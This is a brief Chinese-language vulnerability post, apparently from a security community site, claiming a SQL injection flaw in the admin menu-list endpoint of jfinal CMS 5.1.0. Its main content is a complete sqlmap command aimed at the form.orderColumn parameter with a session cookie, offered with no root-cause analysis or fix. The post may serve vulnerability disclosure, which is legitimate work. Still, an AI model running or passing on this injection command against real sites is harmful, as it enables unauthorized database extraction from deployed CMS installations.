jfinal CMS 5.1.0后台/jfinal_cms/system/menu/list中存在SQL注入漏洞

首先你可以使用 URL
http://你的IP/jfinal_cms/system/menu/list

然后你可以使用 shell

sqlmap -u http://your IP/jfinal_cms/system/menu/list --thread 8 --batch --smart --random-agent --data "form.orderColumn=*&form.orderAsc=&attr.name=&totalRecords=31&pageNo=1&pageSize=20&length=10" --cookie "your cookie"

图片[1]-jfinal  CMS 5.1.0后台/jfinal_cms/system/menu/list中存在SQL注入漏洞-孤勇者社区

图片[2]-jfinal  CMS 5.1.0后台/jfinal_cms/system/menu/list中存在SQL注入漏洞-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞15赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像王时0
    • 头像撒长0